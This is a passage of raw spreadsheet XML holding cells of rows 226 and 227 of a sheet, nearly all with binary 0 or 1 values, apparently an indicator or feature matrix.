        <v>0</v>
      </c>
      <c r="FP226">
        <v>0</v>
      </c>
      <c r="FQ226">
        <v>0</v>
      </c>
      <c r="FR226">
        <v>0</v>
      </c>
      <c r="FS226">
        <v>1</v>
      </c>
      <c r="FT226">
        <v>0</v>
      </c>
      <c r="FU226">
        <v>0</v>
      </c>
      <c r="FV226">
        <v>0</v>
      </c>
      <c r="FW226">
        <v>0</v>
      </c>
      <c r="FX226">
        <v>0</v>
      </c>
      <c r="FY226">
        <v>0</v>
      </c>
      <c r="FZ226">
        <v>0</v>
      </c>
      <c r="GA226">
        <v>0</v>
      </c>
      <c r="GB226">
        <v>0</v>
      </c>
      <c r="GC226">
        <v>0</v>
      </c>
      <c r="GD226">
        <v>0</v>
      </c>
      <c r="GE226">
        <v>0</v>
      </c>
      <c r="GF226">
        <v>0</v>
      </c>
      <c r="GG226">
        <v>0</v>
      </c>
      <c r="GH226">
        <v>0</v>
      </c>
      <c r="GI226">
        <v>0</v>
      </c>
      <c r="GJ226">
        <v>0</v>
      </c>
      <c r="GK226">
        <v>0</v>
      </c>
      <c r="GL226">
        <v>0</v>
      </c>
      <c r="GM226">
        <v>0</v>
      </c>
      <c r="GN226">
        <v>0</v>
      </c>
      <c r="GO226">
        <v>0</v>
      </c>
      <c r="GP226">
        <v>0</v>
      </c>
      <c r="GQ226">
        <v>0</v>
      </c>
      <c r="GR226">
        <v>0</v>
      </c>
      <c r="GS226">
        <v>0</v>
      </c>
      <c r="GT226">
        <v>0</v>
      </c>
      <c r="GU226">
        <v>0</v>
      </c>
      <c r="GV226">
        <v>0</v>
      </c>
      <c r="GW226">
        <v>0</v>
      </c>
      <c r="GX226">
        <v>0</v>
      </c>
      <c r="GY226">
        <v>0</v>
      </c>
      <c r="GZ226">
        <v>0</v>
      </c>
      <c r="HA226">
        <v>0</v>
      </c>
      <c r="HB226">
        <v>1</v>
      </c>
      <c r="HC226">
        <v>0</v>
      </c>
      <c r="HD226">
        <v>0</v>
      </c>
      <c r="HE226">
        <v>0</v>
      </c>
      <c r="HF226">
        <v>0</v>
      </c>
      <c r="HG226">
        <v>0</v>
      </c>
      <c r="HH226">
        <v>0</v>
      </c>
      <c r="HI226">
        <v>0</v>
      </c>
      <c r="HJ226">
        <v>0</v>
      </c>
      <c r="HK226">
        <v>0</v>
      </c>
      <c r="HL226">
        <v>0</v>
      </c>
      <c r="HM226">
        <v>0</v>
      </c>
      <c r="HN226">
        <v>0</v>
      </c>
      <c r="HO226">
        <v>0</v>
      </c>
      <c r="HP226">
        <v>0</v>
      </c>
      <c r="HQ226">
        <v>0</v>
      </c>
      <c r="HR226">
        <v>0</v>
      </c>
      <c r="HS226">
        <v>0</v>
      </c>
      <c r="HT226">
        <v>0</v>
      </c>
      <c r="HU226">
        <v>0</v>
      </c>
      <c r="HV226">
        <v>0</v>
      </c>
      <c r="HW226">
        <v>0</v>
      </c>
      <c r="HX226">
        <v>0</v>
      </c>
      <c r="HY226">
        <v>0</v>
      </c>
      <c r="HZ226">
        <v>0</v>
      </c>
      <c r="IA226">
        <v>0</v>
      </c>
      <c r="IB226">
        <v>0</v>
      </c>
      <c r="IC226">
        <v>0</v>
      </c>
      <c r="ID226">
        <v>0</v>
      </c>
      <c r="IE226">
        <v>0</v>
      </c>
      <c r="IF226">
        <v>0</v>
      </c>
      <c r="IG226">
        <v>0</v>
      </c>
      <c r="IH226">
        <v>0</v>
      </c>
      <c r="II226">
        <v>0</v>
      </c>
      <c r="IJ226">
        <v>0</v>
      </c>
      <c r="IK226">
        <v>0</v>
      </c>
      <c r="IL226">
        <v>0</v>
      </c>
      <c r="IM226">
        <v>0</v>
      </c>
      <c r="IN226">
        <v>0</v>
      </c>
      <c r="IO226">
        <v>0</v>
      </c>
      <c r="IP226">
        <v>1</v>
      </c>
      <c r="IQ226">
        <v>0</v>
      </c>
      <c r="IR226">
        <v>0</v>
      </c>
      <c r="IS226">
        <v>0</v>
      </c>
      <c r="IT226">
        <v>0</v>
      </c>
      <c r="IU226">
        <v>0</v>
      </c>
      <c r="IV226">
        <v>0</v>
      </c>
      <c r="IW226">
        <v>0</v>
      </c>
      <c r="IX226">
        <v>0</v>
      </c>
      <c r="IY226">
        <v>0</v>
      </c>
      <c r="IZ226">
        <v>0</v>
      </c>
      <c r="JA226">
        <v>0</v>
      </c>
      <c r="JB226">
        <v>0</v>
      </c>
      <c r="JC226">
        <v>0</v>
      </c>
      <c r="JD226">
        <v>0</v>
      </c>
      <c r="JE226">
        <v>0</v>
      </c>
      <c r="JF226">
        <v>0</v>
      </c>
      <c r="JG226">
        <v>0</v>
      </c>
      <c r="JH226">
        <v>0</v>
      </c>
      <c r="JI226">
        <v>0</v>
      </c>
      <c r="JJ226">
        <v>0</v>
      </c>
      <c r="JK226">
        <v>0</v>
      </c>
      <c r="JL226">
        <v>0</v>
      </c>
      <c r="JM226">
        <v>0</v>
      </c>
      <c r="JN226">
        <v>0</v>
      </c>
      <c r="JO226">
        <v>0</v>
      </c>
      <c r="JP226">
        <v>0</v>
      </c>
      <c r="JQ226">
        <v>0</v>
      </c>
      <c r="JR226">
        <v>0</v>
      </c>
      <c r="JS226">
        <v>0</v>
      </c>
      <c r="JT226">
        <v>1</v>
      </c>
      <c r="JU226">
        <v>0</v>
      </c>
      <c r="JV226">
        <v>0</v>
      </c>
      <c r="JW226">
        <v>0</v>
      </c>
      <c r="JX226">
        <v>0</v>
      </c>
      <c r="JY226">
        <v>0</v>
      </c>
      <c r="JZ226">
        <v>0</v>
      </c>
      <c r="KA226">
        <v>0</v>
      </c>
      <c r="KB226">
        <v>0</v>
      </c>
      <c r="KC226">
        <v>0</v>
      </c>
      <c r="KD226">
        <v>0</v>
      </c>
      <c r="KE226">
        <v>0</v>
      </c>
      <c r="KF226">
        <v>0</v>
      </c>
      <c r="KG226">
        <v>0</v>
      </c>
      <c r="KH226">
        <v>0</v>
      </c>
      <c r="KI226">
        <v>0</v>
      </c>
      <c r="KJ226">
        <v>0</v>
      </c>
      <c r="KK226">
        <v>0</v>
      </c>
      <c r="KL226">
        <v>0</v>
      </c>
      <c r="KM226">
        <v>0</v>
      </c>
      <c r="KN226">
        <v>0</v>
      </c>
      <c r="KO226">
        <v>0</v>
      </c>
      <c r="KP226">
        <v>0</v>
      </c>
      <c r="KQ226">
        <v>0</v>
      </c>
      <c r="KR226">
        <v>0</v>
      </c>
      <c r="KS226">
        <v>0</v>
      </c>
      <c r="KT226">
        <v>0</v>
      </c>
      <c r="KU226">
        <v>0</v>
      </c>
      <c r="KV226">
        <v>0</v>
      </c>
      <c r="KW226">
        <v>0</v>
      </c>
      <c r="KX226">
        <v>0</v>
      </c>
      <c r="KY226">
        <v>0</v>
      </c>
      <c r="KZ226">
        <v>0</v>
      </c>
      <c r="LA226">
        <v>0</v>
      </c>
      <c r="LB226">
        <v>0</v>
      </c>
      <c r="LC226">
        <v>0</v>
      </c>
      <c r="LD226">
        <v>0</v>
      </c>
      <c r="LE226">
        <v>0</v>
      </c>
      <c r="LF226">
        <v>0</v>
      </c>
      <c r="LG226">
        <v>0</v>
      </c>
      <c r="LH226">
        <v>0</v>
      </c>
      <c r="LI226">
        <v>0</v>
      </c>
      <c r="LJ226">
        <v>0</v>
      </c>
      <c r="LK226">
        <v>0</v>
      </c>
      <c r="LL226">
        <v>0</v>
      </c>
      <c r="LM226">
        <v>0</v>
      </c>
      <c r="LN226">
        <v>0</v>
      </c>
      <c r="LO226">
        <v>0</v>
      </c>
      <c r="LP226">
        <v>0</v>
      </c>
      <c r="LQ226">
        <v>0</v>
      </c>
      <c r="LR226">
        <v>0</v>
      </c>
      <c r="LS226">
        <v>0</v>
      </c>
      <c r="LT226">
        <v>0</v>
      </c>
      <c r="LU226">
        <v>0</v>
      </c>
      <c r="LV226">
        <v>0</v>
      </c>
      <c r="LW226">
        <v>0</v>
      </c>
      <c r="LX226">
        <v>1</v>
      </c>
      <c r="LY226">
        <v>0</v>
      </c>
      <c r="LZ226">
        <v>0</v>
      </c>
      <c r="MA226">
        <v>0</v>
      </c>
      <c r="MB226">
        <v>0</v>
      </c>
      <c r="MC226">
        <v>0</v>
      </c>
      <c r="MD226">
        <v>0</v>
      </c>
      <c r="ME226">
        <v>0</v>
      </c>
      <c r="MF226">
        <v>0</v>
      </c>
      <c r="MG226">
        <v>0</v>
      </c>
      <c r="MH226">
        <v>0</v>
      </c>
      <c r="MI226">
        <v>0</v>
      </c>
      <c r="MJ226">
        <v>0</v>
      </c>
      <c r="MK226">
        <v>0</v>
      </c>
      <c r="ML226">
        <v>0</v>
      </c>
      <c r="MM226">
        <v>0</v>
      </c>
      <c r="MN226">
        <v>0</v>
      </c>
      <c r="MO226">
        <v>0</v>
      </c>
      <c r="MP226">
        <v>0</v>
      </c>
      <c r="MQ226">
        <v>0</v>
      </c>
      <c r="MR226">
        <v>1</v>
      </c>
      <c r="MS226">
        <v>0</v>
      </c>
      <c r="MT226">
        <v>0</v>
      </c>
      <c r="MU226">
        <v>0</v>
      </c>
      <c r="MV226">
        <v>0</v>
      </c>
      <c r="MW226">
        <v>0</v>
      </c>
      <c r="MX226">
        <v>0</v>
      </c>
      <c r="MY226">
        <v>0</v>
      </c>
      <c r="MZ226">
        <v>0</v>
      </c>
      <c r="NA226">
        <v>0</v>
      </c>
      <c r="NB226">
        <v>0</v>
      </c>
      <c r="NC226">
        <v>0</v>
      </c>
      <c r="ND226">
        <v>0</v>
      </c>
      <c r="NE226">
        <v>0</v>
      </c>
      <c r="NF226">
        <v>0</v>
      </c>
      <c r="NG226">
        <v>0</v>
      </c>
      <c r="NH226">
        <v>0</v>
      </c>
      <c r="NI226">
        <v>0</v>
      </c>
      <c r="NJ226">
        <v>0</v>
      </c>
      <c r="NK226">
        <v>0</v>
      </c>
      <c r="NL226">
        <v>0</v>
      </c>
      <c r="NM226">
        <v>0</v>
      </c>
      <c r="NN226">
        <v>0</v>
      </c>
      <c r="NO226">
        <v>0</v>
      </c>
      <c r="NP226">
        <v>0</v>
      </c>
      <c r="NQ226">
        <v>0</v>
      </c>
      <c r="NR226">
        <v>0</v>
      </c>
      <c r="NS226">
        <v>0</v>
      </c>
      <c r="NT226">
        <v>0</v>
      </c>
      <c r="NU226">
        <v>0</v>
      </c>
      <c r="NV226">
        <v>0</v>
      </c>
      <c r="NW226">
        <v>0</v>
      </c>
      <c r="NX226">
        <v>0</v>
      </c>
      <c r="NY226">
        <v>0</v>
      </c>
      <c r="NZ226">
        <v>0</v>
      </c>
      <c r="OA226">
        <v>0</v>
      </c>
      <c r="OB226">
        <v>0</v>
      </c>
      <c r="OC226">
        <v>0</v>
      </c>
      <c r="OD226">
        <v>0</v>
      </c>
      <c r="OE226">
        <v>0</v>
      </c>
      <c r="OF226">
        <v>0</v>
      </c>
      <c r="OG226">
        <v>0</v>
      </c>
      <c r="OH226">
        <v>0</v>
      </c>
      <c r="OI226">
        <v>0</v>
      </c>
      <c r="OJ226">
        <v>0</v>
      </c>
      <c r="OK226">
        <v>0</v>
      </c>
      <c r="OL226">
        <v>0</v>
      </c>
      <c r="OM226">
        <v>0</v>
      </c>
      <c r="ON226">
        <v>0</v>
      </c>
      <c r="OO226">
        <v>0</v>
      </c>
      <c r="OP226">
        <v>0</v>
      </c>
      <c r="OQ226">
        <v>0</v>
      </c>
      <c r="OR226">
        <v>0</v>
      </c>
      <c r="OS226">
        <v>0</v>
      </c>
      <c r="OT226">
        <v>0</v>
      </c>
      <c r="OU226">
        <v>0</v>
      </c>
      <c r="OV226">
        <v>0</v>
      </c>
      <c r="OW226">
        <v>0</v>
      </c>
      <c r="OX226">
        <v>0</v>
      </c>
      <c r="OY226">
        <v>0</v>
      </c>
      <c r="OZ226">
        <v>0</v>
      </c>
      <c r="PA226">
        <v>0</v>
      </c>
      <c r="PB226">
        <v>0</v>
      </c>
      <c r="PC226">
        <v>0</v>
      </c>
      <c r="PD226">
        <v>0</v>
      </c>
      <c r="PE226">
        <v>0</v>
      </c>
      <c r="PF226">
        <v>0</v>
      </c>
      <c r="PG226">
        <v>0</v>
      </c>
      <c r="PH226">
        <v>0</v>
      </c>
      <c r="PI226">
        <v>0</v>
      </c>
      <c r="PJ226">
        <v>0</v>
      </c>
      <c r="PK226">
        <v>0</v>
      </c>
      <c r="PL226">
        <v>0</v>
      </c>
      <c r="PM226">
        <v>0</v>
      </c>
      <c r="PN226">
        <v>0</v>
      </c>
      <c r="PO226">
        <v>0</v>
      </c>
      <c r="PP226">
        <v>0</v>
      </c>
      <c r="PQ226">
        <v>0</v>
      </c>
      <c r="PR226">
        <v>0</v>
      </c>
      <c r="PS226">
        <v>0</v>
      </c>
      <c r="PT226">
        <v>0</v>
      </c>
      <c r="PU226">
        <v>1</v>
      </c>
      <c r="PV226">
        <v>0</v>
      </c>
      <c r="PW226">
        <v>0</v>
      </c>
      <c r="PX226">
        <v>0</v>
      </c>
      <c r="PY226">
        <v>0</v>
      </c>
      <c r="PZ226">
        <v>0</v>
      </c>
      <c r="QA226">
        <v>0</v>
      </c>
      <c r="QB226">
        <v>0</v>
      </c>
      <c r="QC226">
        <v>0</v>
      </c>
      <c r="QD226">
        <v>0</v>
      </c>
      <c r="QE226">
        <v>0</v>
      </c>
      <c r="QF226">
        <v>0</v>
      </c>
      <c r="QG226">
        <v>0</v>
      </c>
      <c r="QH226">
        <v>0</v>
      </c>
      <c r="QI226">
        <v>0</v>
      </c>
      <c r="QJ226">
        <v>0</v>
      </c>
      <c r="QK226">
        <v>0</v>
      </c>
      <c r="QL226">
        <v>0</v>
      </c>
      <c r="QM226">
        <v>0</v>
      </c>
      <c r="QN226">
        <v>0</v>
      </c>
      <c r="QO226">
        <v>0</v>
      </c>
      <c r="QP226">
        <v>1</v>
      </c>
      <c r="QQ226">
        <v>0</v>
      </c>
      <c r="QR226">
        <v>0</v>
      </c>
      <c r="QS226">
        <v>0</v>
      </c>
      <c r="QT226">
        <v>0</v>
      </c>
      <c r="QU226">
        <v>0</v>
      </c>
      <c r="QV226">
        <v>0</v>
      </c>
      <c r="QW226">
        <v>0</v>
      </c>
      <c r="QX226">
        <v>0</v>
      </c>
      <c r="QY226">
        <v>0</v>
      </c>
      <c r="QZ226">
        <v>0</v>
      </c>
      <c r="RA226">
        <v>0</v>
      </c>
      <c r="RB226">
        <v>0</v>
      </c>
      <c r="RC226">
        <v>0</v>
      </c>
      <c r="RD226">
        <v>0</v>
      </c>
      <c r="RE226">
        <v>0</v>
      </c>
      <c r="RF226">
        <v>0</v>
      </c>
      <c r="RG226">
        <v>0</v>
      </c>
      <c r="RH226">
        <v>0</v>
      </c>
      <c r="RI226">
        <v>0</v>
      </c>
      <c r="RJ226">
        <v>0</v>
      </c>
      <c r="RK226">
        <v>0</v>
      </c>
      <c r="RL226">
        <v>0</v>
      </c>
      <c r="RM226">
        <v>0</v>
      </c>
      <c r="RN226">
        <v>0</v>
      </c>
      <c r="RO226">
        <v>0</v>
      </c>
      <c r="RP226">
        <v>0</v>
      </c>
      <c r="RQ226">
        <v>0</v>
      </c>
      <c r="RR226">
        <v>0</v>
      </c>
      <c r="RS226">
        <v>0</v>
      </c>
      <c r="RT226">
        <v>0</v>
      </c>
      <c r="RU226">
        <v>0</v>
      </c>
      <c r="RV226">
        <v>0</v>
      </c>
      <c r="RW226">
        <v>0</v>
      </c>
      <c r="RX226">
        <v>0</v>
      </c>
      <c r="RY226">
        <v>0</v>
      </c>
      <c r="RZ226">
        <v>0</v>
      </c>
      <c r="SA226">
        <v>0</v>
      </c>
    </row>
    <row r="227" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A227" s="6" t="s">
        <v>5175</v>
      </c>
      <c r="B227">
        <v>43</v>
      </c>
      <c r="C227">
        <v>0</v>
      </c>
      <c r="D227">
        <v>0</v>
      </c>
      <c r="E227">
        <v>0</v>
      </c>
      <c r="F227">
        <v>1</v>
      </c>
      <c r="G227">
        <v>0</v>
      </c>
      <c r="H227">
        <v>0</v>
      </c>
      <c r="I227">
        <v>0</v>
      </c>
      <c r="J227">
        <v>0</v>
      </c>
      <c r="K227">
        <v>0</v>
      </c>
      <c r="L227">
        <v>0</v>
      </c>
      <c r="M227">
        <v>0</v>
      </c>
      <c r="N227">
        <v>0</v>
      </c>
      <c r="O227">
        <v>0</v>
      </c>
      <c r="P227">
        <v>1</v>
      </c>
      <c r="Q227">
        <v>0</v>
      </c>
      <c r="R227">
        <v>0</v>
      </c>
      <c r="S227">
        <v>0</v>
      </c>
      <c r="T227">
        <v>0</v>
      </c>
      <c r="U227">
        <v>0</v>
      </c>
      <c r="V227">
        <v>0</v>
      </c>
      <c r="W227">
        <v>0</v>
      </c>
      <c r="X227">
        <v>0</v>
      </c>
      <c r="Y227">
        <v>0</v>
      </c>
      <c r="Z227">
        <v>0</v>
      </c>
      <c r="AA227">
        <v>0</v>
      </c>
      <c r="AB227">
        <v>0</v>
      </c>
      <c r="AC227">
        <v>1</v>
      </c>
      <c r="AD227">
        <v>0</v>
      </c>
      <c r="AE227">
        <v>0</v>
      </c>
      <c r="AF227">
        <v>0</v>
      </c>
      <c r="AG227">
        <v>0</v>
      </c>
      <c r="AH227">
        <v>0</v>
      </c>
      <c r="AI227">
        <v>0</v>
      </c>
      <c r="AJ227">
        <v>0</v>
      </c>
      <c r="AK227">
        <v>0</v>
      </c>
      <c r="AL227">
        <v>0</v>
      </c>
      <c r="AM227">
        <v>0</v>
      </c>
      <c r="AN227">
        <v>0</v>
      </c>
      <c r="AO227">
        <v>0</v>
      </c>
      <c r="AP227">
        <v>0</v>
      </c>
      <c r="AQ227">
        <v>1</v>
      </c>
      <c r="AR227">
        <v>0</v>
      </c>
      <c r="AS227">
        <v>0</v>
      </c>
      <c r="AT227">
        <v>0</v>
      </c>
      <c r="AU227">
        <v>0</v>
      </c>
      <c r="AV227">
        <v>0</v>
      </c>
      <c r="AW227">
        <v>0</v>
      </c>
      <c r="AX227">
        <v>1</v>
      </c>
      <c r="AY227">
        <v>0</v>
      </c>
      <c r="AZ227">
        <v>0</v>
      </c>
      <c r="BA227">
        <v>0</v>
      </c>
      <c r="BB227">
        <v>0</v>
      </c>
      <c r="BC227">
        <v>0</v>
      </c>
      <c r="BD227">
        <v>0</v>
      </c>
      <c r="BE227">
        <v>0</v>
      </c>
      <c r="BF227">
        <v>1</v>
      </c>
      <c r="BG227">
        <v>0</v>
      </c>
      <c r="BH227">
        <v>0</v>
      </c>
      <c r="BI227">
        <v>0</v>
      </c>
      <c r="BJ227">
        <v>0</v>
      </c>
      <c r="BK227">
        <v>0</v>
      </c>
      <c r="BL227">
        <v>0</v>
      </c>
      <c r="BM227">
        <v>0</v>
      </c>
      <c r="BN227">
        <v>0</v>
      </c>
      <c r="BO227">
        <v>0</v>
      </c>
      <c r="BP227">
        <v>0</v>
      </c>
      <c r="BQ227">
        <v>0</v>
      </c>
      <c r="BR227">
        <v>0</v>
      </c>
      <c r="BS227">
        <v>0</v>
      </c>
      <c r="BT227">
        <v>0</v>
      </c>
      <c r="BU227">
        <v>0</v>
      </c>
      <c r="BV227">
        <v>0</v>
      </c>
      <c r="BW227">
        <v>0</v>
      </c>
      <c r="BX227">
        <v>0</v>
      </c>
      <c r="BY227">
        <v>0</v>
      </c>
      <c r="BZ227">
        <v>0</v>
      </c>
      <c r="CA227">
        <v>0</v>
      </c>
      <c r="CB227">
        <v>1</v>
      </c>
      <c r="CC227">
        <v>0</v>
      </c>
      <c r="CD227">
        <v>0</v>
      </c>
      <c r="CE227">
        <v>0</v>
      </c>
      <c r="CF227">
        <v>0</v>
      </c>
      <c r="CG227">
        <v>1</v>
      </c>
      <c r="CH227">
        <v>0</v>
      </c>
      <c r="CI227">
        <v>0</v>
      </c>
      <c r="CJ227">
        <v>0</v>
      </c>
      <c r="CK227">
        <v>0</v>
      </c>
      <c r="CL227">
        <v>0</v>
      </c>
      <c r="CM227">
        <v>1</v>
      </c>
      <c r="CN227">
        <v>0</v>
      </c>
      <c r="CO227">
        <v>0</v>
      </c>
      <c r="CP227">
        <v>0</v>
      </c>
      <c r="CQ227">
        <v>0</v>
      </c>
      <c r="CR227">
        <v>0</v>
      </c>
      <c r="CS227">
        <v>0</v>
      </c>
      <c r="CT227">
        <v>0</v>
      </c>
      <c r="CU227">
        <v>0</v>
      </c>
      <c r="CV227">
        <v>0</v>
      </c>
      <c r="CW227">
        <v>0</v>
      </c>
      <c r="CX227">
        <v>0</v>
      </c>
      <c r="CY227">
        <v>0</v>
      </c>
      <c r="CZ227">
        <v>0</v>
      </c>
      <c r="DA227">
        <v>0</v>
      </c>
      <c r="DB227">
        <v>0</v>
      </c>
      <c r="DC227">
        <v>0</v>
      </c>
      <c r="DD227">
        <v>0</v>
      </c>
      <c r="DE227">
        <v>0</v>
      </c>
      <c r="DF227">
        <v>0</v>
      </c>
      <c r="DG227">
        <v>0</v>
      </c>
      <c r="DH227">
        <v>0</v>
      </c>
      <c r="DI227">
        <v>1</v>
      </c>
      <c r="DJ227">
        <v>0</v>
      </c>
      <c r="DK227">
        <v>1</v>
      </c>
      <c r="DL227">
        <v>1</v>
      </c>
      <c r="DM227">
        <v>1</v>
      </c>
      <c r="DN227">
        <v>0</v>
      </c>
      <c r="DO227">
        <v>0</v>
      </c>
      <c r="DP227">
        <v>0</v>
      </c>
      <c r="DQ227">
        <v>0</v>
      </c>
      <c r="DR227">
        <v>0</v>
      </c>
      <c r="DS227">
        <v>0</v>
      </c>
      <c r="DT227">
        <v>0</v>
      </c>
      <c r="DU227">
        <v>0</v>
      </c>
      <c r="DV227">
        <v>0</v>
      </c>
      <c r="DW227">
        <v>0</v>
      </c>
      <c r="DX227">
        <v>1</v>
      </c>
      <c r="DY227">
        <v>0</v>
      </c>
      <c r="DZ227">
        <v>0</v>
      </c>
      <c r="EA227">
        <v>0</v>
      </c>
      <c r="EB227">
        <v>0</v>
      </c>
      <c r="EC227">
        <v>1</v>
      </c>
      <c r="ED227">
        <v>0</v>
      </c>
      <c r="EE227">
        <v>0</v>
      </c>
      <c r="EF227">
        <v>0</v>
      </c>
      <c r="EG227">
        <v>0</v>
      </c>
      <c r="EH227">
        <v>1</v>
      </c>
      <c r="EI227">
        <v>0</v>
      </c>
      <c r="EJ227">
        <v>0</v>
      </c>
      <c r="EK227">
        <v>0</v>
      </c>
      <c r="EL227">
        <v>0</v>
      </c>
      <c r="EM227">
        <v>0</v>
      </c>
      <c r="EN227">
        <v>0</v>
      </c>
      <c r="EO227">
        <v>0</v>
      </c>
      <c r="EP227">
        <v>0</v>
      </c>
      <c r="EQ227">
        <v>0</v>
      </c>
      <c r="ER227">
        <v>0</v>
      </c>
      <c r="ES227">
        <v>0</v>
      </c>
      <c r="ET227">
        <v>0</v>
      </c>
      <c r="EU227">
        <v>0</v>
      </c>
      <c r="EV227">
        <v>0</v>
      </c>
      <c r="EW227">
        <v>0</v>
      </c>
      <c r="EX227">
        <v>0</v>
      </c>
      <c r="EY227">
        <v>0</v>
      </c>
      <c r="EZ227">
        <v>0</v>
      </c>
      <c r="FA227">
        <v>1</v>
      </c>
      <c r="FB227">
        <v>0</v>
      </c>
      <c r="FC227">
        <v>0</v>
      </c>
      <c r="FD227">
        <v>0</v>
      </c>
      <c r="FE227">
        <v>0</v>
      </c>
      <c r="FF227">
        <v>0</v>
      </c>
      <c r="FG227">
        <v>0</v>
      </c>
      <c r="FH227">
        <v>0</v>
      </c>
      <c r="FI227">
        <v>0</v>
      </c>
      <c r="FJ227">
        <v>0</v>
      </c>
      <c r="FK227">
        <v>0</v>
      </c>
      <c r="FL227">
        <v>0</v>
      </c>
      <c r="FM227">
        <v>0</v>
      </c>
      <c r="FN227">
        <v>0</v>
      </c>
      <c r="FO227">
        <v>0</v>
      </c>
      <c r="FP227">
        <v>0</v>
      </c>
      <c r="FQ227">
        <v>0</v>
      </c>
      <c r="FR227">
        <v>0</v>
      </c>
      <c r="FS227">
        <v>0</v>
      </c>
      <c r="FT227">
        <v>0</v>
      </c>
      <c r="FU227">
        <v>0</v>
      </c>
      <c r="FV227">
        <v>0</v>
      </c>
      <c r="FW227">
        <v>0</v>
      </c>
      <c r="FX227">
        <v>0</v>
      </c>
      <c r="FY227">
        <v>0</v>
      </c>
      <c r="FZ227">
        <v>0</v>
      </c>
      <c r="GA227">
        <v>0</v>
      </c>
      <c r="GB227">
        <v>0</v>
      </c>
      <c r="GC227">
        <v>0</v>
      </c>
      <c r="GD227">
        <v>0</v>
      </c>
      <c r="GE227">
        <v>0</v>
      </c>
      <c r="GF227">
        <v>1</v>
      </c>
      <c r="GG227">
        <v>0</v>
      </c>
      <c r="GH227">
        <v>0</v>
      </c>
      <c r="GI227">
        <v>0</v>
      </c>
      <c r="GJ227">
        <v>0</v>
      </c>
      <c r="GK227">
        <v>1</v>
      </c>
      <c r="GL227">
        <v>0</v>
      </c>
      <c r="GM227">
        <v>0</v>
      </c>
      <c r="GN227">
        <v>0</v>
      </c>
      <c r="GO227">
        <v>0</v>
      </c>
      <c r="GP227">
        <v>0</v>
      </c>
      <c r="GQ227">
        <v>0</v>
      </c>
      <c r="GR227">
        <v>0</v>
      </c>
      <c r="GS227">
        <v>1</v>
      </c>
      <c r="GT227">
        <v>0</v>
      </c>
      <c r="GU227">
        <v>0</v>
      </c>
      <c r="GV227">
        <v>0</v>
      </c>
      <c r="GW227">
        <v>0</v>
      </c>
      <c r="GX227">
        <v>0</v>
      </c>
      <c r="GY227">
        <v>0</v>
      </c>
      <c r="GZ227">
        <v>0</v>
      </c>
      <c r="HA227">
        <v>0</v>
      </c>
      <c r="HB227">
        <v>1</v>
      </c>
      <c r="HC227">
        <v>0</v>
      </c>
      <c r="HD227">
        <v>1</v>
      </c>
      <c r="HE227">
        <v>0</v>
      </c>
      <c r="HF227">
        <v>0</v>
      </c>
      <c r="HG227">
        <v>0</v>
      </c>
      <c r="HH227">
        <v>0</v>
      </c>
      <c r="HI227">
        <v>0</v>
      </c>
      <c r="HJ227">
        <v>0</v>
      </c>
      <c r="HK227">
        <v>0</v>
      </c>
      <c r="HL227">
        <v>0</v>
      </c>
      <c r="HM227">
        <v>0</v>
      </c>
      <c r="HN227">
        <v>0</v>
      </c>
      <c r="HO227">
        <v>0</v>
      </c>
      <c r="HP227">
        <v>0</v>
      </c>
      <c r="HQ227">
        <v>0</v>
      </c>
      <c r="HR227">
        <v>0</v>
      </c>
      <c r="HS227">
        <v>0</v>
      </c>
      <c r="HT227">
        <v>0</v>
      </c>
      <c r="HU227">
        <v>0</v>
      </c>
      <c r="HV227">
        <v>0</v>
      </c>
      <c r="HW227">
        <v>0</v>
      </c>
      <c r="HX227">
        <v>1</v>
      </c>
      <c r="HY227">
        <v>0</v>
      </c>
      <c r="HZ227">
        <v>0</v>
      </c>
      <c r="IA227">
        <v>1</v>
      </c>
      <c r="IB227">
        <v>0</v>
      </c>
      <c r="IC227">
        <v>0</v>
      </c>
      <c r="ID227">
        <v>0</v>
      </c>
      <c r="IE227">
        <v>0</v>
      </c>
      <c r="IF227">
        <v>0</v>
      </c>
      <c r="IG227">
        <v>0</v>
      </c>
      <c r="IH227">
        <v>0</v>
      </c>
      <c r="II227">
        <v>0</v>
      </c>
      <c r="IJ227">
        <v>0</v>
      </c>
      <c r="IK227">
        <v>0</v>
      </c>
      <c r="IL227">
        <v>0</v>
      </c>
      <c r="IM227">
        <v>0</v>
      </c>
      <c r="IN227">
        <v>0</v>
      </c>
      <c r="IO227">
        <v>0</v>
      </c>
      <c r="IP227">
        <v>0</v>
      </c>
      <c r="IQ227">
        <v>1</v>
      </c>
      <c r="IR227">
        <v>0</v>
      </c>
      <c r="IS227">
        <v>0</v>
      </c>
      <c r="IT227">
        <v>0</v>
      </c>
      <c r="IU227">
        <v>0</v>
      </c>
      <c r="IV227">
        <v>1</v>
      </c>
      <c r="IW227">
        <v>0</v>
      </c>
      <c r="IX227">
        <v>0</v>
      </c>
      <c r="IY227">
        <v>0</v>
      </c>
      <c r="IZ227">
        <v>0</v>
      </c>
      <c r="JA227">
        <v>0</v>
      </c>
      <c r="JB227">
        <v>0</v>
      </c>
      <c r="JC227">
        <v>0</v>
      </c>
      <c r="JD227">
        <v>0</v>
      </c>
      <c r="JE227">
        <v>0</v>
      </c>
      <c r="JF227">
        <v>0</v>
      </c>
      <c r="JG227">
        <v>0</v>
      </c>
      <c r="JH227">
        <v>0</v>
      </c>
      <c r="JI227">
        <v>1</v>
      </c>
      <c r="JJ227">
        <v>0</v>
      </c>
      <c r="JK227">
        <v>0</v>
      </c>
      <c r="JL227">
        <v>0</v>
      </c>
      <c r="JM227">
        <v>0</v>
      </c>
      <c r="JN227">
        <v>0</v>
      </c>
      <c r="JO227">
        <v>0</v>
      </c>
      <c r="JP227">
        <v>0</v>
      </c>
      <c r="JQ227">
        <v>0</v>
      </c>
      <c r="JR227">
        <v>0</v>
      </c>
      <c r="JS227">
        <v>0</v>
      </c>
      <c r="JT227">
        <v>0</v>
      </c>
      <c r="JU227">
        <v>0</v>
      </c>
      <c r="JV227">
        <v>0</v>
      </c>
      <c r="JW227">
        <v>0</v>
      </c>
      <c r="JX227">
        <v>0</v>
      </c>
      <c r="JY227">
        <v>0</v>
      </c>
      <c r="JZ227">
        <v>0</v>
      </c>
      <c r="KA227">
        <v>0</v>
      </c>
      <c r="KB227">
        <v>0</v>
      </c>
      <c r="KC227">
        <v>0</v>
      </c>
      <c r="KD227">
        <v>0</v>
      </c>
      <c r="KE227">
        <v>0</v>
      </c>
      <c r="KF227">
        <v>0</v>
      </c>
      <c r="KG227">
        <v>0</v>
      </c>
      <c r="KH227">
        <v>1</v>
      </c>
      <c r="KI227">
        <v>0</v>
      </c>
      <c r="KJ227">
        <v>0</v>
      </c>
      <c r="KK227">
